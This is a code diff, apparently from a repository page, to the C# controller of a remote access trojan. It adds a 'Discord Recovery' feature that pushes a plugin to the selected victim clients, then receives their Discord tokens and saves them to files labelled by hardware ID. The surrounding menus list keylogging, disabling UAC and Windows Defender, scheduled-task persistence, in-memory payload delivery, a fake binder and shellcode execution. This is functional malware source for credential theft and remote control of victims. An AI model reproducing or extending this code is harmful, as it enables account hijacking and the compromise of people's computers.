this.cLEARToolStripMenuItem.Size = new System.Drawing.Size(76, 22);
|
||||
this.cLEARToolStripMenuItem.Text = "Clear";
|
||||
this.cLEARToolStripMenuItem.Click += new System.EventHandler(this.CLEARToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -676,20 +685,20 @@
|
|||
this.sTARTToolStripMenuItem,
|
||||
this.sTOPToolStripMenuItem});
|
||||
this.contextMenuThumbnail.Name = "contextMenuStrip2";
|
||||
this.contextMenuThumbnail.Size = new System.Drawing.Size(104, 48);
|
||||
this.contextMenuThumbnail.Size = new System.Drawing.Size(99, 48);
|
||||
//
|
||||
// sTARTToolStripMenuItem
|
||||
//
|
||||
this.sTARTToolStripMenuItem.ForeColor = System.Drawing.SystemColors.ControlText;
|
||||
this.sTARTToolStripMenuItem.Name = "sTARTToolStripMenuItem";
|
||||
this.sTARTToolStripMenuItem.Size = new System.Drawing.Size(103, 22);
|
||||
this.sTARTToolStripMenuItem.Size = new System.Drawing.Size(98, 22);
|
||||
this.sTARTToolStripMenuItem.Text = "Start";
|
||||
this.sTARTToolStripMenuItem.Click += new System.EventHandler(this.STARTToolStripMenuItem_Click);
|
||||
//
|
||||
// sTOPToolStripMenuItem
|
||||
//
|
||||
this.sTOPToolStripMenuItem.Name = "sTOPToolStripMenuItem";
|
||||
this.sTOPToolStripMenuItem.Size = new System.Drawing.Size(103, 22);
|
||||
this.sTOPToolStripMenuItem.Size = new System.Drawing.Size(98, 22);
|
||||
this.sTOPToolStripMenuItem.Text = "Stop";
|
||||
this.sTOPToolStripMenuItem.Click += new System.EventHandler(this.STOPToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -716,80 +725,80 @@
|
|||
this.dELETETASKToolStripMenuItem});
|
||||
this.contextMenuTasks.Name = "contextMenuStrip4";
|
||||
this.contextMenuTasks.ShowImageMargin = false;
|
||||
this.contextMenuTasks.Size = new System.Drawing.Size(170, 230);
|
||||
this.contextMenuTasks.Size = new System.Drawing.Size(157, 230);
|
||||
//
|
||||
// sendFileFromUrlToolStripMenuItem
|
||||
//
|
||||
this.sendFileFromUrlToolStripMenuItem.Name = "sendFileFromUrlToolStripMenuItem";
|
||||
this.sendFileFromUrlToolStripMenuItem.Size = new System.Drawing.Size(169, 22);
|
||||
this.sendFileFromUrlToolStripMenuItem.Size = new System.Drawing.Size(156, 22);
|
||||
this.sendFileFromUrlToolStripMenuItem.Text = "Send file from url";
|
||||
this.sendFileFromUrlToolStripMenuItem.Click += new System.EventHandler(this.sendFileFromUrlToolStripMenuItem_Click);
|
||||
//
|
||||
// downloadAndExecuteToolStripMenuItem
|
||||
//
|
||||
this.downloadAndExecuteToolStripMenuItem.Name = "downloadAndExecuteToolStripMenuItem";
|
||||
this.downloadAndExecuteToolStripMenuItem.Size = new System.Drawing.Size(169, 22);
|
||||
this.downloadAndExecuteToolStripMenuItem.Size = new System.Drawing.Size(156, 22);
|
||||
this.downloadAndExecuteToolStripMenuItem.Text = "Send file to disk";
|
||||
this.downloadAndExecuteToolStripMenuItem.Click += new System.EventHandler(this.DownloadAndExecuteToolStripMenuItem_Click);
|
||||
//
|
||||
// sENDFILETOMEMORYToolStripMenuItem1
|
||||
//
|
||||
this.sENDFILETOMEMORYToolStripMenuItem1.Name = "sENDFILETOMEMORYToolStripMenuItem1";
|
||||
this.sENDFILETOMEMORYToolStripMenuItem1.Size = new System.Drawing.Size(169, 22);
|
||||
this.sENDFILETOMEMORYToolStripMenuItem1.Size = new System.Drawing.Size(156, 22);
|
||||
this.sENDFILETOMEMORYToolStripMenuItem1.Text = "Send file to memory";
|
||||
this.sENDFILETOMEMORYToolStripMenuItem1.Click += new System.EventHandler(this.SENDFILETOMEMORYToolStripMenuItem1_Click);
|
||||
//
|
||||
// disableUACToolStripMenuItem1
|
||||
//
|
||||
this.disableUACToolStripMenuItem1.Name = "disableUACToolStripMenuItem1";
|
||||
this.disableUACToolStripMenuItem1.Size = new System.Drawing.Size(169, 22);
|
||||
this.disableUACToolStripMenuItem1.Size = new System.Drawing.Size(156, 22);
|
||||
this.disableUACToolStripMenuItem1.Text = "Disable UAC";
|
||||
this.disableUACToolStripMenuItem1.Click += new System.EventHandler(this.disableUACToolStripMenuItem1_Click);
|
||||
//
|
||||
// disableWDToolStripMenuItem1
|
||||
//
|
||||
this.disableWDToolStripMenuItem1.Name = "disableWDToolStripMenuItem1";
|
||||
this.disableWDToolStripMenuItem1.Size = new System.Drawing.Size(169, 22);
|
||||
this.disableWDToolStripMenuItem1.Size = new System.Drawing.Size(156, 22);
|
||||
this.disableWDToolStripMenuItem1.Text = "Disable WD";
|
||||
this.disableWDToolStripMenuItem1.Click += new System.EventHandler(this.disableWDToolStripMenuItem1_Click);
|
||||
//
|
||||
// installSchtaskToolStripMenuItem
|
||||
//
|
||||
this.installSchtaskToolStripMenuItem.Name = "installSchtaskToolStripMenuItem";
|
||||
this.installSchtaskToolStripMenuItem.Size = new System.Drawing.Size(169, 22);
|
||||
this.installSchtaskToolStripMenuItem.Size = new System.Drawing.Size(156, 22);
|
||||
this.installSchtaskToolStripMenuItem.Text = "Install Schtask";
|
||||
this.installSchtaskToolStripMenuItem.Click += new System.EventHandler(this.installSchtaskToolStripMenuItem_Click);
|
||||
//
|
||||
// uPDATEToolStripMenuItem1
|
||||
//
|
||||
this.uPDATEToolStripMenuItem1.Name = "uPDATEToolStripMenuItem1";
|
||||
this.uPDATEToolStripMenuItem1.Size = new System.Drawing.Size(169, 22);
|
||||
this.uPDATEToolStripMenuItem1.Size = new System.Drawing.Size(156, 22);
|
||||
this.uPDATEToolStripMenuItem1.Text = "Update all clients";
|
||||
this.uPDATEToolStripMenuItem1.Click += new System.EventHandler(this.UPDATEToolStripMenuItem1_Click);
|
||||
//
|
||||
// autoKeyloggerToolStripMenuItem
|
||||
//
|
||||
this.autoKeyloggerToolStripMenuItem.Name = "autoKeyloggerToolStripMenuItem";
|
||||
this.autoKeyloggerToolStripMenuItem.Size = new System.Drawing.Size(169, 22);
|
||||
this.autoKeyloggerToolStripMenuItem.Size = new System.Drawing.Size(156, 22);
|
||||
this.autoKeyloggerToolStripMenuItem.Text = "Auto Keylogger";
|
||||
this.autoKeyloggerToolStripMenuItem.Click += new System.EventHandler(this.autoKeyloggerToolStripMenuItem_Click);
|
||||
//
|
||||
// fakeBinderToolStripMenuItem
|
||||
//
|
||||
this.fakeBinderToolStripMenuItem.Name = "fakeBinderToolStripMenuItem";
|
||||
this.fakeBinderToolStripMenuItem.Size = new System.Drawing.Size(169, 22);
|
||||
this.fakeBinderToolStripMenuItem.Size = new System.Drawing.Size(156, 22);
|
||||
this.fakeBinderToolStripMenuItem.Text = "Fake Binder";
|
||||
this.fakeBinderToolStripMenuItem.Click += new System.EventHandler(this.fakeBinderToolStripMenuItem_Click);
|
||||
//
|
||||
// toolStripSeparator4
|
||||
//
|
||||
this.toolStripSeparator4.Name = "toolStripSeparator4";
|
||||
this.toolStripSeparator4.Size = new System.Drawing.Size(166, 6);
|
||||
this.toolStripSeparator4.Size = new System.Drawing.Size(153, 6);
|
||||
//
|
||||
// dELETETASKToolStripMenuItem
|
||||
//
|
||||
this.dELETETASKToolStripMenuItem.Name = "dELETETASKToolStripMenuItem";
|
||||
this.dELETETASKToolStripMenuItem.Size = new System.Drawing.Size(169, 22);
|
||||
this.dELETETASKToolStripMenuItem.Size = new System.Drawing.Size(156, 22);
|
||||
this.dELETETASKToolStripMenuItem.Text = "Delete";
|
||||
this.dELETETASKToolStripMenuItem.Click += new System.EventHandler(this.DELETETASKToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -823,7 +832,7 @@
|
|||
this.HelpToolStripMenuItem});
|
||||
this.menuStrip1.Location = new System.Drawing.Point(0, 0);
|
||||
this.menuStrip1.Name = "menuStrip1";
|
||||
this.menuStrip1.Size = new System.Drawing.Size(867, 25);
|
||||
this.menuStrip1.Size = new System.Drawing.Size(867, 24);
|
||||
this.menuStrip1.TabIndex = 4;
|
||||
this.menuStrip1.Text = "menuStrip1";
|
||||
//
|
||||
|
@ -835,34 +844,34 @@
|
|||
this.SettingToolStripMenuItem,
|
||||
this.ExitToolStripMenuItem});
|
||||
this.FileToolStripMenuItem.Name = "FileToolStripMenuItem";
|
||||
this.FileToolStripMenuItem.Size = new System.Drawing.Size(39, 21);
|
||||
this.FileToolStripMenuItem.Size = new System.Drawing.Size(37, 20);
|
||||
this.FileToolStripMenuItem.Text = "File";
|
||||
//
|
||||
// BuilderToolStripMenuItem
|
||||
//
|
||||
this.BuilderToolStripMenuItem.Name = "BuilderToolStripMenuItem";
|
||||
this.BuilderToolStripMenuItem.Size = new System.Drawing.Size(117, 22);
|
||||
this.BuilderToolStripMenuItem.Size = new System.Drawing.Size(111, 22);
|
||||
this.BuilderToolStripMenuItem.Text = "Builder";
|
||||
this.BuilderToolStripMenuItem.Click += new System.EventHandler(this.builderToolStripMenuItem1_Click);
|
||||
//
|
||||
// BlockToolStripMenuItem
|
||||
//
|
||||
this.BlockToolStripMenuItem.Name = "BlockToolStripMenuItem";
|
||||
this.BlockToolStripMenuItem.Size = new System.Drawing.Size(117, 22);
|
||||
this.BlockToolStripMenuItem.Size = new System.Drawing.Size(111, 22);
|
||||
this.BlockToolStripMenuItem.Text = "Block";
|
||||
this.BlockToolStripMenuItem.Click += new System.EventHandler(this.BlockToolStripMenuItem_Click);
|
||||
//
|
||||
// SettingToolStripMenuItem
|
||||
//
|
||||
this.SettingToolStripMenuItem.Name = "SettingToolStripMenuItem";
|
||||
this.SettingToolStripMenuItem.Size = new System.Drawing.Size(117, 22);
|
||||
this.SettingToolStripMenuItem.Size = new System.Drawing.Size(111, 22);
|
||||
this.SettingToolStripMenuItem.Text = "Setting";
|
||||
this.SettingToolStripMenuItem.Click += new System.EventHandler(this.SettingToolStripMenuItem_Click);
|
||||
//
|
||||
// ExitToolStripMenuItem
|
||||
//
|
||||
this.ExitToolStripMenuItem.Name = "ExitToolStripMenuItem";
|
||||
this.ExitToolStripMenuItem.Size = new System.Drawing.Size(117, 22);
|
||||
this.ExitToolStripMenuItem.Size = new System.Drawing.Size(111, 22);
|
||||
this.ExitToolStripMenuItem.Text = "Exit";
|
||||
this.ExitToolStripMenuItem.Click += new System.EventHandler(this.ExitToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -872,27 +881,27 @@
|
|||
this.DocumentToolStripMenuItem,
|
||||
this.AboutToolStripMenuItem});
|
||||
this.HelpToolStripMenuItem.Name = "HelpToolStripMenuItem";
|
||||
this.HelpToolStripMenuItem.Size = new System.Drawing.Size(47, 21);
|
||||
this.HelpToolStripMenuItem.Size = new System.Drawing.Size(44, 20);
|
||||
this.HelpToolStripMenuItem.Text = "Help";
|
||||
//
|
||||
// DocumentToolStripMenuItem
|
||||
//
|
||||
this.DocumentToolStripMenuItem.Name = "DocumentToolStripMenuItem";
|
||||
this.DocumentToolStripMenuItem.Size = new System.Drawing.Size(135, 22);
|
||||
this.DocumentToolStripMenuItem.Size = new System.Drawing.Size(130, 22);
|
||||
this.DocumentToolStripMenuItem.Text = "Document";
|
||||
this.DocumentToolStripMenuItem.Click += new System.EventHandler(this.DocumentToolStripMenuItem_Click);
|
||||
//
|
||||
// AboutToolStripMenuItem
|
||||
//
|
||||
this.AboutToolStripMenuItem.Name = "AboutToolStripMenuItem";
|
||||
this.AboutToolStripMenuItem.Size = new System.Drawing.Size(135, 22);
|
||||
this.AboutToolStripMenuItem.Size = new System.Drawing.Size(130, 22);
|
||||
this.AboutToolStripMenuItem.Text = "About";
|
||||
this.AboutToolStripMenuItem.Click += new System.EventHandler(this.aboutToolStripMenuItem1_Click);
|
||||
//
|
||||
// splitContainer1
|
||||
//
|
||||
this.splitContainer1.Dock = System.Windows.Forms.DockStyle.Fill;
|
||||
this.splitContainer1.Location = new System.Drawing.Point(0, 25);
|
||||
this.splitContainer1.Location = new System.Drawing.Point(0, 24);
|
||||
this.splitContainer1.Name = "splitContainer1";
|
||||
this.splitContainer1.Orientation = System.Windows.Forms.Orientation.Horizontal;
|
||||
//
|
||||
|
@ -903,8 +912,8 @@
|
|||
// splitContainer1.Panel2
|
||||
//
|
||||
this.splitContainer1.Panel2.Controls.Add(this.listView2);
|
||||
this.splitContainer1.Size = new System.Drawing.Size(867, 376);
|
||||
this.splitContainer1.SplitterDistance = 221;
|
||||
this.splitContainer1.Size = new System.Drawing.Size(867, 412);
|
||||
this.splitContainer1.SplitterDistance = 242;
|
||||
this.splitContainer1.TabIndex = 5;
|
||||
//
|
||||
// tabControl1
|
||||
|
@ -917,7 +926,7 @@
|
|||
this.tabControl1.Margin = new System.Windows.Forms.Padding(2);
|
||||
this.tabControl1.Name = "tabControl1";
|
||||
this.tabControl1.SelectedIndex = 0;
|
||||
this.tabControl1.Size = new System.Drawing.Size(867, 221);
|
||||
this.tabControl1.Size = new System.Drawing.Size(867, 242);
|
||||
this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed;
|
||||
this.tabControl1.TabIndex = 3;
|
||||
//
|
||||
|
@ -928,7 +937,7 @@
|
|||
this.tabPage1.Margin = new System.Windows.Forms.Padding(2);
|
||||
this.tabPage1.Name = "tabPage1";
|
||||
this.tabPage1.Padding = new System.Windows.Forms.Padding(2);
|
||||
this.tabPage1.Size = new System.Drawing.Size(859, 195);
|
||||
this.tabPage1.Size = new System.Drawing.Size(859, 216);
|
||||
this.tabPage1.TabIndex = 0;
|
||||
this.tabPage1.Text = "Clients";
|
||||
//
|
||||
|
@ -959,7 +968,7 @@
|
|||
this.listView1.Name = "listView1";
|
||||
this.listView1.ShowGroups = false;
|
||||
this.listView1.ShowItemToolTips = true;
|
||||
this.listView1.Size = new System.Drawing.Size(855, 191);
|
||||
this.listView1.Size = new System.Drawing.Size(855, 212);
|
||||
this.listView1.TabIndex = 0;
|
||||
this.listView1.UseCompatibleStateImageBehavior = false;
|
||||
this.listView1.View = System.Windows.Forms.View.Details;
|
||||
|
@ -1035,7 +1044,7 @@
|
|||
this.tabPage3.Location = new System.Drawing.Point(4, 22);
|
||||
this.tabPage3.Margin = new System.Windows.Forms.Padding(2);
|
||||
this.tabPage3.Name = "tabPage3";
|
||||
this.tabPage3.Size = new System.Drawing.Size(859, 195);
|
||||
this.tabPage3.Size = new System.Drawing.Size(859, 213);
|
||||
this.tabPage3.TabIndex = 2;
|
||||
this.tabPage3.Text = "Screens";
|
||||
this.tabPage3.UseVisualStyleBackColor = true;
|
||||
|
@ -1050,7 +1059,7 @@
|
|||
this.listView3.Margin = new System.Windows.Forms.Padding(2);
|
||||
this.listView3.Name = "listView3";
|
||||
this.listView3.ShowItemToolTips = true;
|
||||
this.listView3.Size = new System.Drawing.Size(859, 195);
|
||||
this.listView3.Size = new System.Drawing.Size(859, 213);
|
||||
this.listView3.SmallImageList = this.ThumbnailImageList;
|
||||
this.listView3.TabIndex = 0;
|
||||
this.listView3.UseCompatibleStateImageBehavior = false;
|
||||
|
@ -1062,7 +1071,7 @@
|
|||
this.tabPage4.Margin = new System.Windows.Forms.Padding(2);
|
||||
this.tabPage4.Name = "tabPage4";
|
||||
this.tabPage4.Padding = new System.Windows.Forms.Padding(2);
|
||||
this.tabPage4.Size = new System.Drawing.Size(859, 195);
|
||||
this.tabPage4.Size = new System.Drawing.Size(859, 213);
|
||||
this.tabPage4.TabIndex = 3;
|
||||
this.tabPage4.Text = "Auto Task";
|
||||
this.tabPage4.UseVisualStyleBackColor = true;
|
||||
|
@ -1080,7 +1089,7 @@
|
|||
this.listView4.Location = new System.Drawing.Point(2, 2);
|
||||
this.listView4.Margin = new System.Windows.Forms.Padding(2);
|
||||
this.listView4.Name = "listView4";
|
||||
this.listView4.Size = new System.Drawing.Size(855, 191);
|
||||
this.listView4.Size = new System.Drawing.Size(855, 209);
|
||||
this.listView4.TabIndex = 0;
|
||||
this.listView4.UseCompatibleStateImageBehavior = false;
|
||||
this.listView4.View = System.Windows.Forms.View.Details;
|
||||
|
@ -1111,7 +1120,7 @@
|
|||
this.listView2.Name = "listView2";
|
||||
this.listView2.ShowGroups = false;
|
||||
this.listView2.ShowItemToolTips = true;
|
||||
this.listView2.Size = new System.Drawing.Size(867, 151);
|
||||
this.listView2.Size = new System.Drawing.Size(867, 166);
|
||||
this.listView2.TabIndex = 2;
|
||||
this.listView2.UseCompatibleStateImageBehavior = false;
|
||||
this.listView2.View = System.Windows.Forms.View.Details;
|
||||
|
@ -1132,18 +1141,18 @@
|
|||
this.ConnectTimeout.Interval = 5000;
|
||||
this.ConnectTimeout.Tick += new System.EventHandler(this.ConnectTimeout_Tick);
|
||||
//
|
||||
// noSystemToolStripMenuItem
|
||||
// DiscordRecoveryToolStripMenuItem
|
||||
//
|
||||
this.noSystemToolStripMenuItem.Name = "noSystemToolStripMenuItem";
|
||||
this.noSystemToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.noSystemToolStripMenuItem.Text = "No System";
|
||||
this.noSystemToolStripMenuItem.Click += new System.EventHandler(this.noSystemToolStripMenuItem_Click);
|
||||
this.DiscordRecoveryToolStripMenuItem.Name = "DiscordRecoveryToolStripMenuItem";
|
||||
this.DiscordRecoveryToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.DiscordRecoveryToolStripMenuItem.Text = "Discord Recovery";
|
||||
this.DiscordRecoveryToolStripMenuItem.Click += new System.EventHandler(this.DiscordRecoveryToolStripMenuItem_Click);
|
||||
//
|
||||
// Form1
|
||||
//
|
||||
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
|
||||
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
|
||||
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
|
||||
this.ClientSize = new System.Drawing.Size(867, 423);
|
||||
this.ClientSize = new System.Drawing.Size(867, 458);
|
||||
this.Controls.Add(this.splitContainer1);
|
||||
this.Controls.Add(this.statusStrip1);
|
||||
this.Controls.Add(this.menuStrip1);
|
||||
|
@ -1301,6 +1310,7 @@
|
|||
private System.Windows.Forms.ToolStripMenuItem justForFunToolStripMenuItem;
|
||||
private System.Windows.Forms.ToolStripMenuItem runShellcodeToolStripMenuItem;
|
||||
private System.Windows.Forms.ToolStripMenuItem noSystemToolStripMenuItem;
|
||||
private System.Windows.Forms.ToolStripMenuItem DiscordRecoveryToolStripMenuItem;
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -1630,6 +1630,27 @@ namespace Server
|
|||
}
|
||||
}
|
||||
|
||||
private void DiscordRecoveryToolStripMenuItem_Click(object sender, EventArgs e)
|
||||
{
|
||||
try
|
||||
{
|
||||
MsgPack msgpack = new MsgPack();
|
||||
msgpack.ForcePathObject("Pac_ket").AsString = "plu_gin";
|
||||
msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Discord.dll"));
|
||||
|
||||
foreach (Clients client in GetSelectedClients())
|
||||
{
|
||||
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
|
||||
}
|
||||
new HandleLogs().Addmsg("Recovering Discord...", Color.Black);
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
MessageBox.Show(ex.Message);
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
private void FodhelperToolStripMenuItem_Click(object sender, EventArgs e)
|
||||
{
|
||||
if (listView1.SelectedItems.Count > 0)
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
using Server.MessagePack;
|
||||
using Server.Connection;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Drawing;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Windows.Forms;
|
||||
|
||||
namespace Server.Handle_Packet
|
||||
{
|
||||
public class HandleDiscordRecovery
|
||||
{
|
||||
public HandleDiscordRecovery(Clients client, MsgPack unpack_msgpack)
|
||||
{
|
||||
try
|
||||
{
|
||||
string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder", unpack_msgpack.ForcePathObject("Hwid").AsString, "Discord");
|
||||
string tokens = unpack_msgpack.ForcePathObject("Tokens").AsString;
|
||||
if (!string.IsNullOrWhiteSpace(tokens))
|
||||
{
|
||||
if (!Directory.Exists(fullPath))
|
||||
Directory.CreateDirectory(fullPath);
|
||||
File.WriteAllText(fullPath + "\\Tokens_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", tokens.Replace("\n", Environment.NewLine));
|
||||
new HandleLogs().Addmsg($"Client {client.Ip} discord recovery success,file located @ ClientsFolder \\ {unpack_msgpack.ForcePathObject("Hwid").AsString} \\ Discord", Color.Purple);
|
||||
}
|
||||
else
|
||||
{
|
||||
new HandleLogs().Addmsg($"Client {client.Ip} discord recovery error", Color.MediumPurple);
|
||||
}
|
||||
client?.Disconnected();
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
new HandleLogs().Addmsg(ex.Message, Color.Red);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
|
@ -197,6 +197,11 @@ namespace Server.Handle_Packet
|
|||
new HandleRecovery(client, unpack_msgpack);
|
||||
break;
|
||||
}
|
||||
case "discordRecovery":
|
||||
{
|
||||
new HandleDiscordRecovery(client, unpack_msgpack);
|
||||
break;
|
||||
}
|
||||
|
||||
case "regManager":
|
||||
{
|
||||
|
|
|
@ -307,6 +307,7 @@
|
|||
<DependentUpon>FrmReverseProxy.cs</DependentUpon>
|
||||
</Compile>
|
||||
<Compile Include="Handle Packet\HandleAudio.cs" />
|
||||
<Compile Include="Handle Packet\HandleDiscordRecovery.cs" />
|
||||
<Compile Include="Handle Packet\HandleFun.cs" />
|
||||
<Compile Include="Handle Packet\HandlePassword.cs" />
|
||||
<Compile Include="Handle Packet\HandleInformation.cs" />
|
||||
|
|
Loading…
Reference in New Issue